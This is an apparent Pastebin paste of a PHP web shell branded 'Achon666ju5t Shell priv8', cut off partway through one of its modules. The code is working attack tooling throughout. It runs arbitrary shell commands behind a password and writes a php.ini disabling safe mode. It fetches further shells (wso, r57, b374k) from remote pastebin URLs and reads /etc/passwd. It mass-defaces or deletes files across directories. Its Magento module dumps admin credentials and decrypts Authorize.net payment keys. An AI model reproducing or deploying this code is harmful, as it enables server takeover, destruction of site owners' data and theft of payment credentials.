SHARE
TWEET

Untitled

a guest Dec 23rd, 2017 188 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @error_log(0);
  5. @ini_set('error_log',NULL);
  6. @ini_set('log_errors',0);
  7. @ini_set('max_execution_time',0);
  8. @ini_set('output_buffering',0);
  9. @ini_set('display_errors', 0);
  10. @set_time_limit(0);
  11. @set_magic_quotes_runtime(0);
  12. $lol="2ed348e96478fc3e4b88bcfb1882f684";
  13. function printLogin() {
  14.     ?>
  15. <html>
  16. <head>
  17. <title>AchonXjusT</title>
  18. <link href='https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg' rel='icon' type='image/x-icon'/>
  19. <meta name='author' content='Achon666ju5t'>
  20. <meta charset="UTF-8">
  21. <style type='text/css'>
  22. @import url(https://fonts.googleapis.com/css?family=Abel);
  23. html {
  24.     background: #000000;
  25.     color: #ffffff;
  26.     font-family: 'Abel';
  27.     font-size: 13px;
  28.     width: 100%;
  29. }
  30. input[type=text], input[type=password],input[type=submit] {
  31.     background: transparent;
  32.     color: #ffffff;
  33.     border: 1px solid #ffffff;
  34.     margin: 5px auto;
  35.     padding-left: 5px;
  36.     font-family: 'Abel';
  37.     font-size: 13px;
  38. }
  39. </style>
  40. </head>
  41.     <style>
  42.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  43.     </style>
  44.     <center><img src="https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg"</img>  
  45.     <br><font size="5"> Achon666ju5t Shell priv8<br>Extreme Crew - BlackHat Hackers<br> Masukin Passwordnya Goblok !!!<br></font><form method=post>
  46.     <input type=password name=janchonx>
  47.     </form></center>
  48.     <?php
  49.    
  50.     exit;
  51. }
  52. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  53.     if( empty( $lol ) ||
  54.         ( isset( $_POST['janchonx'] ) && ( md5($_POST['janchonx']) == $lol ) ) )
  55.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  56.     else
  57.         printLogin();
  58. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  59.     @ob_clean();
  60.     $file = $_GET['file'];
  61.     header('Content-Description: File Transfer');
  62.     header('Content-Type: application/octet-stream');
  63.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  64.     header('Expires: 0');
  65.     header('Cache-Control: must-revalidate');
  66.     header('Pragma: public');
  67.     header('Content-Length: ' . filesize($file));
  68.     readfile($file);
  69.     exit;
  70. }  
  71.    
  72. ?>
  73. <html>
  74. <head>
  75. <title>AchonXjusT</title>
  76. <link href='https://lh4.googleusercontent.com/-vRbahBaV4GA/VGiPnhH1PqI/AAAAAAAAABw/pYik-TNuvFU/w810-h587-no/diev4owl.jpg' rel='icon' type='image/x-icon'/>
  77. <meta name='author' content='Achon666ju5t'>
  78. <meta charset="UTF-8">
  79. <style type='text/css'>
  80. @import url(https://fonts.googleapis.com/css?family=Abel);
  81. html {
  82.     background: #000000;
  83.     color: #ffffff;
  84.     font-family: 'Abel';
  85.     font-size: 13px;
  86.     width: 100%;
  87. }
  88. li {
  89.     display: inline;
  90.     margin: 5px;
  91.     padding: 5px;
  92. }
  93. table, th, td {
  94.     border-collapse:collapse;
  95.     font-family: Tahoma, Geneva, sans-serif;
  96.     background: transparent;
  97.     font-family: 'Abel';
  98.     font-size: 13px;
  99. }
  100. .table_home, .th_home, .td_home {
  101.     border: 1px solid #ffffff;
  102. }
  103. th {
  104.     padding: 10px;
  105. }
  106. a {
  107.     color: #ffffff;
  108.     text-decoration: none;
  109. }
  110. a:hover {
  111.     color: gold;
  112.     text-decoration: underline;
  113. }
  114. b {
  115.     color: gold;
  116. }
  117. input[type=text], input[type=password],input[type=submit] {
  118.     background: transparent;
  119.     color: #ffffff;
  120.     border: 1px solid #ffffff;
  121.     margin: 5px auto;
  122.     padding-left: 5px;
  123.     font-family: 'Abel';
  124.     font-size: 13px;
  125. }
  126. textarea {
  127.     border: 1px solid #ffffff;
  128.     width: 100%;
  129.     height: 400px;
  130.     padding-left: 5px;
  131.     margin: 10px auto;
  132.     resize: none;
  133.     background: transparent;
  134.     color: #ffffff;
  135.     font-family: 'Abel';
  136.     font-size: 13px;
  137. }
  138. select {
  139.     background: transparent;
  140.     color: #ffffff;
  141.     border: 1px solid #ffffff;
  142.     margin: 5px auto;
  143.     padding-left: 5px;
  144.     font-family: 'Abel';
  145.     font-size: 13px;
  146. }
  147. .but {
  148.     background: transparent;
  149.     color: #ffffff;
  150.     border: 1px solid #ffffff;
  151.     margin: 5px auto;
  152.     padding-left: 5px;
  153.     font-family: 'Abel';
  154.     font-size: 13px;
  155. }
  156. </style>
  157. </head>
  158. <?php
  159. if (file_exists("php.ini")){
  160. }else{
  161. $img = fopen('php.ini', 'w');
  162. $sec = "safe_mode = OFF
  163. disable_funtions = NONE";
  164. fwrite($img ,$sec);
  165. fclose($img);}     
  166. function w($dir,$perm) {
  167.     if(!is_writable($dir)) {
  168.         return "<font color=red>".$perm."</font>";
  169.     } else {
  170.         return "<font color=lime>".$perm."</font>";
  171.     }
  172. }
  173.     function UrlLoop($url,$type){
  174.  
  175.         $urlArray = array();
  176.  
  177.         $ch = curl_init();
  178.         curl_setopt($ch, CURLOPT_URL, $url);
  179.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  180.         $result = curl_exec($ch);
  181.  
  182.         $regex='|<a.*?href="(.*?)"|';
  183.         preg_match_all($regex,$result,$parts);
  184.         $links=$parts[1];
  185.         foreach($links as $link){
  186.             array_push($urlArray, $link);
  187.         }
  188.         curl_close($ch);
  189.  
  190.         foreach($urlArray as $value){
  191.             $lol="$url$value";
  192.             if(preg_match("#$type#is", $lol)) {
  193.                 echo "$lol\r\n";
  194.             }
  195.         }
  196.     }
  197. function exe($cmd) {    
  198. if(function_exists('system')) {        
  199.         @ob_start();       
  200.         @system($cmd);     
  201.         $buff = @ob_get_contents();        
  202.         @ob_end_clean();       
  203.         return $buff;  
  204.     } elseif(function_exists('exec')) {        
  205.         @exec($cmd,$results);      
  206.         $buff = "";        
  207.         foreach($results as $result) {         
  208.             $buff .= $result;      
  209.         } return $buff;    
  210.     } elseif(function_exists('passthru')) {        
  211.         @ob_start();       
  212.         @passthru($cmd);       
  213.         $buff = @ob_get_contents();        
  214.         @ob_end_clean();       
  215.         return $buff;  
  216.     } elseif(function_exists('shell_exec')) {      
  217.         $buff = @shell_exec($cmd);     
  218.         return $buff;  
  219.     }
  220. }
  221. function perms($file){
  222. $perms = fileperms($file);
  223. if (($perms & 0xC000) == 0xC000) {
  224. $info = 's';
  225. } elseif (($perms & 0xA000) == 0xA000) {
  226. $info = 'l';
  227. } elseif (($perms & 0x8000) == 0x8000) {
  228. $info = '-';
  229. } elseif (($perms & 0x6000) == 0x6000) {
  230. $info = 'b';
  231. } elseif (($perms & 0x4000) == 0x4000) {
  232. $info = 'd';
  233. } elseif (($perms & 0x2000) == 0x2000) {
  234. $info = 'c';
  235. } elseif (($perms & 0x1000) == 0x1000) {
  236. $info = 'p';
  237. } else {
  238. $info = 'u';
  239. }
  240. $info .= (($perms & 0x0100) ? 'r' : '-');
  241. $info .= (($perms & 0x0080) ? 'w' : '-');
  242. $info .= (($perms & 0x0040) ?
  243. (($perms & 0x0800) ? 's' : 'x' ) :
  244. (($perms & 0x0800) ? 'S' : '-'));
  245. $info .= (($perms & 0x0020) ? 'r' : '-');
  246. $info .= (($perms & 0x0010) ? 'w' : '-');
  247. $info .= (($perms & 0x0008) ?
  248. (($perms & 0x0400) ? 's' : 'x' ) :
  249. (($perms & 0x0400) ? 'S' : '-'));
  250. $info .= (($perms & 0x0004) ? 'r' : '-');
  251. $info .= (($perms & 0x0002) ? 'w' : '-');
  252. $info .= (($perms & 0x0001) ?
  253. (($perms & 0x0200) ? 't' : 'x' ) :
  254. (($perms & 0x0200) ? 'T' : '-'));
  255. return $info;
  256. }
  257. function hdd($s) {
  258. if($s >= 1073741824)
  259. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  260. elseif($s >= 1048576)
  261. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  262. elseif($s >= 1024)
  263. return sprintf('%1.2f',$s / 1024 ) .' KB';
  264. else
  265. return $s .' B';
  266. }
  267. function ambilKata($param, $kata1, $kata2){
  268.     if(strpos($param, $kata1) === FALSE) return FALSE;
  269.     if(strpos($param, $kata2) === FALSE) return FALSE;
  270.     $start = strpos($param, $kata1) + strlen($kata1);
  271.     $end = strpos($param, $kata2, $start);
  272.     $return = substr($param, $start, $end - $start);
  273.     return $return;
  274. }
  275. if(get_magic_quotes_gpc()) {
  276.     function idx_ss($array) {
  277.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  278.     }
  279.     $_POST = idx_ss($_POST);
  280. }
  281. function CreateTools($names,$lokasi){
  282.     if ( $_GET['create'] == $names ){
  283.         $a= "".$_SERVER['SERVER_NAME']."";
  284. $b= dirname($_SERVER['PHP_SELF']);
  285. $c = "/chonx_tools/".$names.".php";
  286. if (file_exists('chonx_tools/'.$names.'.php')){
  287.     echo '<script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';
  288.     }
  289.     else {mkdir("chonx_tools", 0777);
  290. file_put_contents('chonx_tools/'.$names.'.php', file_get_contents($lokasi));
  291. echo ' <script type="text/javascript">alert("Done");window.location.href = "chonx_tools/'.$names.'.php";</script> ';}}}
  292.  
  293. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  294. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  295. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  296. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  297. CreateTools("MailerDelay","https://pastebin.com/raw/7LRvRwNm");
  298. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  299. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  300. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  301. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  302. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  303. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  304. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  305. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  306. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  307. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  308. if(isset($_GET['dir'])) {
  309.     $dir = $_GET['dir'];
  310.     chdir($_GET['dir']);
  311. } else {
  312.     $dir = getcwd();
  313. }
  314. $dir = str_replace("\\","/",$dir);
  315. $scdir = explode("/", $dir);
  316. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  317. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  318. $ds = @ini_get("disable_functions");
  319. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  320. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  321. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  322. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  323. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  324. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  325. if(!function_exists('posix_getegid')) {
  326.     $user = @get_current_user();
  327.     $uid = @getmyuid();
  328.     $gid = @getmygid();
  329.     $group = "?";
  330. } else {
  331.     $uid = @posix_getpwuid(posix_geteuid());
  332.     $gid = @posix_getgrgid(posix_getegid());
  333.     $user = $uid['name'];
  334.     $uid = $uid['uid'];
  335.     $group = $gid['name'];
  336.     $gid = $gid['gid'];
  337. }
  338. $d0mains = @file("/etc/named.conf");
  339.             $users=@file('/etc/passwd');
  340.         if($d0mains)
  341.         {
  342.             $count;  
  343.             foreach($d0mains as $d0main)
  344.             {
  345.                 if(@ereg("zone",$d0main))
  346.                 {
  347.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  348.                     flush();
  349.                     if(strlen(trim($domains[1][0])) > 2)
  350.                     {
  351.                         flush();
  352.                         $count++;
  353.                     }
  354.                 }
  355.             }
  356.         }
  357.  
  358. $sport=$_SERVER['SERVER_PORT'];
  359. echo "<table style='width:100%'>";
  360. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  361. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  362. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  363. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  364. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  365. echo "<tr><td>Port :<font color=lime>  $sport</font> </td></tr>";
  366. echo "<tr><td>Safe Mode: $sm</td></tr>";
  367. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  368.  
  369. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  370. echo "<tr><td>Current DIR: ";
  371. foreach($scdir as $c_dir => $cdir) {   
  372.     echo "<a href='?dir=";
  373.     for($i = 0; $i <= $c_dir; $i++) {
  374.         echo $scdir[$i];
  375.         if($i != $c_dir) {
  376.         echo "/";
  377.         }
  378.     }
  379.     echo "'>$cdir</a>/";
  380. }
  381. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  382.     Command :
  383.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  384.     </form></td></tr>";
  385. echo "</table><hr>";
  386. echo "<center>";
  387. echo "<ul>";
  388. echo "<li>[ <a href='?'>Home</a> ]</li>";
  389. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  390. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  391. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  392. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  393. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config 2</a> ]</li>";
  394. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  395. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  396. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  397. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  398. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  402. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  406. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/passw</a> ]<br></li>";
  411. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  418. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  419. echo "</ul>";
  420. echo "</center>";
  421. echo "<hr>";
  422. if($_GET['do'] == 'upload') {
  423.     echo "<center>";
  424.     if($_POST['upload']) {
  425.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  426.             $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  427.         } else {
  428.             $act = "<font color=red>failed to upload file</font>";
  429.         }
  430.     }
  431.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  432.     echo $act;
  433.     echo "</center>";
  434. }
  435.  elseif($_GET['do'] == 'cmd') {
  436.     if($_POST['do_cmd']) {
  437.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  438.     }
  439. } elseif($_GET['do'] == 'mass_deface') {
  440.     echo "<center><form action=\"\" method=\"post\">\n";
  441.     $dirr=$_POST['d_dir'];
  442.     $index = $_POST["script"];
  443.     $index = str_replace('"',"'",$index);
  444.     $index = stripslashes($index);
  445.     function edit_file($file,$index){
  446.         if (is_writable($file)) {
  447.         clear_fill($file,$index);
  448.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  449.         }
  450.         else {
  451.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  452.             }
  453.             }
  454.     function hapus_massal($dir,$namafile) {
  455.         if(is_writable($dir)) {
  456.             $dira = scandir($dir);
  457.             foreach($dira as $dirb) {
  458.                 $dirc = "$dir/$dirb";
  459.                 $lokasi = $dirc.'/'.$namafile;
  460.                 if($dirb === '.') {
  461.                     if(file_exists("$dir/$namafile")) {
  462.                         unlink("$dir/$namafile");
  463.                     }
  464.                 } elseif($dirb === '..') {
  465.                     if(file_exists("".dirname($dir)."/$namafile")) {
  466.                         unlink("".dirname($dir)."/$namafile");
  467.                     }
  468.                 } else {
  469.                     if(is_dir($dirc)) {
  470.                         if(is_writable($dirc)) {
  471.                             if(file_exists($lokasi)) {
  472.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  473.                                 unlink($lokasi);
  474.                                 $idx = hapus_massal($dirc,$namafile);
  475.                             }
  476.                         }
  477.                     }
  478.                 }
  479.             }
  480.         }
  481.     }
  482.     function clear_fill($file,$index){
  483.         if(file_exists($file)){
  484.             $handle = fopen($file,'w');
  485.             fwrite($handle,'');
  486.             fwrite($handle,$index);
  487.             fclose($handle);  } }
  488.  
  489.     function gass(){
  490.         global $dirr , $index ;
  491.         chdir($dirr);
  492.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  493.         $files = scandir($dirr) ;
  494.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  495.         sort($files);
  496.         $n = 0 ;
  497.         foreach ($files as $file){
  498.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  499.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  500.                 edit_file($file,$index);
  501.                 flush();
  502.                 $n = $n +1 ;
  503.                 }
  504.                 }
  505.                 echo "<br>";
  506.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  507.                     }
  508.     function ListFiles($dirrall) {
  509.  
  510.     if($dh = opendir($dirrall)) {
  511.  
  512.        $files = Array();
  513.        $inner_files = Array();
  514.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  515.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  516.         while($file = readdir($dh)) {
  517.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  518.                 if(is_dir($dirrall . "/" . $file)) {
  519.                     $inner_files = ListFiles($dirrall . "/" . $file);
  520.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  521.                 } else {
  522.                     array_push($files, $dirrall . "/" . $file);
  523.                 }
  524.             }
  525.             }
  526.  
  527.             closedir($dh);
  528.             return $files;
  529.         }
  530.     }
  531.     function gass_all(){
  532.         global $index ;
  533.         $dirrall=$_POST['d_dir'];
  534.         foreach (ListFiles($dirrall) as $key=>$file){
  535.             $file = str_replace('//',"/",$file);
  536.             echo "<center><strong>$file</strong> ===>";
  537.             edit_file($file,$index);
  538.             flush();
  539.         }
  540.         $key = $key+1;
  541.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  542.     function sabun_massal($dir,$namafile,$isi_script) {
  543.         if(is_writable($dir)) {
  544.             $dira = scandir($dir);
  545.             foreach($dira as $dirb) {
  546.                 $dirc = "$dir/$dirb";
  547.                 $lokasi = $dirc.'/'.$namafile;
  548.                 if($dirb === '.') {
  549.                     file_put_contents($lokasi, $isi_script);
  550.                 } elseif($dirb === '..') {
  551.                     file_put_contents($lokasi, $isi_script);
  552.                 } else {
  553.                     if(is_dir($dirc)) {
  554.                         if(is_writable($dirc)) {
  555.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  556.                             file_put_contents($lokasi, $isi_script);
  557.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  558.                         }
  559.                     }
  560.                 }
  561.             }
  562.         }
  563.     }
  564.     if($_POST['mass'] == 'onedir') {
  565.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  566.         $ini="http://";
  567.         $mainpath=$_POST[d_dir];
  568.         $file=$_POST[d_file];
  569.         $dir=opendir("$mainpath");
  570.         $code=base64_encode($_POST[script]);
  571.         $indx=base64_decode($code);
  572.         while($row=readdir($dir)){
  573.         $start=@fopen("$row/$file","w+");
  574.         $finish=@fwrite($start,$indx);
  575.         if ($finish){
  576.             echo"$ini$row/$file\n";
  577.             }
  578.         }
  579.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  580.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  581.         $dir=opendir("$mainpath");
  582.         $code=base64_encode($_POST[script]);
  583.         $indx=base64_decode($code);
  584.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  585.         $finish=@fwrite($start,$indx);
  586.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  587.         }
  588.  
  589.     }
  590.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  591.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  592.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  593.     elseif($_POST['mass'] == 'massdeface') {
  594.         echo "<div style='margin: 5px auto; padding: 5px'>";
  595.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  596.         echo "</div>";  }
  597.     else {
  598.         echo "
  599.         <center><font style='text-decoration: underline;'>
  600.         Select Type:<br>
  601.         </font>
  602.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  603.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  604.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  605.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  606.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  607.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  608.         <font style='text-decoration: underline;'>Folder:</font><br>
  609.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  610.         <font style='text-decoration: underline;'>Filename:</font><br>
  611.         <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
  612.         <font style='text-decoration: underline;'>Index File:</font><br>
  613.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Achon666ju5t</textarea><br>
  614.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  615.         </form></center>";
  616.         }
  617.     }
  618. elseif($_GET['do'] == 'magen') {
  619. echo'
  620. <div id="page-wrap">  
  621. <center>  
  622. <br>  
  623. <FORM action=""  method="post">  
  624. <div align="center">[M A G E N T O] - Stealing Information<br>  
  625. <div align="center">coder: sohai & n4KuLa_<br>  
  626. <input type="hidden" name="form_action" value="2">  
  627. </div>  
  628. </div>  
  629. ';  
  630.  
  631.  
  632. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
  633.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
  634.     if(isset($xml->global->resources->default_setup->connection)) {  
  635.        $connection = $xml->global->resources->default_setup->connection;  
  636.        $prefix = $xml->global->resources->db->table_prefix;  
  637.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
  638.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
  639.          
  640.        try {  
  641.            $app = Mage::app('default');  
  642.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
  643.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
  644.  
  645.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
  646.            print("Could not connect: " . mysql_error());  
  647.        }  
  648.        mysql_select_db($connection->dbname);  
  649.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
  650.  
  651.     $crypto = new Varien_Crypt_Mcrypt();  
  652.     $crypto->init($key);  
  653.  
  654.     //=========================================================================================================  
  655.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
  656.     if (!$query){  
  657.           echo "<center><b>Gagal</b></center>";  
  658.     }else{  
  659.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
  660.           echo'<br><br>  
  661.                 ====================================================================<br>  
  662.                                 [ Admin FROM website : '.$site['website'].'] <br>  
  663.                 ====================================================================<br>';  
  664.     }  
  665.     echo "  
  666.     <table border='1' align='center' >  
  667.     <tr>  
  668.     <td>id</td>  
  669.     <td>firstname</td>  
  670.     <td>lastname</td>  
  671.     <td>email</td>  
  672.     <td>username</td>  
  673.     <td>password</td>  
  674.     </tr>";  
  675.         while($vx = mysql_fetch_array($query)) {  
  676.         $no = 1;  
  677.         $user_id = $vx['user_id'];  
  678.         $username = $vx['username'];  
  679.         $password = $vx['password'];  
  680.         $email = $vx['email'];  
  681.         $firstname = $vx['firstname'];  
  682.         $lastname = $vx['lastname'];  
  683.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
  684.         }  
  685.     echo "</table><br>";  
  686.     //=========================================================================================================  
  687.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
  688.     if(mysql_num_rows($query) != 0){  
  689.         if (!$query){  
  690.               echo "<center><b>Gagal</b></center>";  
  691.         }else{  
  692.               echo'<br><br>  
  693.                     ====================================================================<br>  
  694.                                     [ Authorizenet ] <br>  
  695.                     ====================================================================<br>';  
  696.         }  
  697.         echo "  
  698.         <table border='1' align='center' >  
  699.         <tr>  
  700.         <td>no</td>  
  701.         <td>user</td>  
  702.         <td>pass</td>      
  703.         </tr>";  
  704.             $no = 1;  
  705.             while($vx = mysql_fetch_array($query)) {  
  706.             $user = $crypto->decrypt($vx['user']);  
  707.             $pass = $crypto->decrypt($vx['pass']);  
  708.  
  709.              
  710.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  711.             $no++;  
  712.             }  
  713.         echo "</table><br>";  
  714.     }  
  715.     //=========================================================================================================  
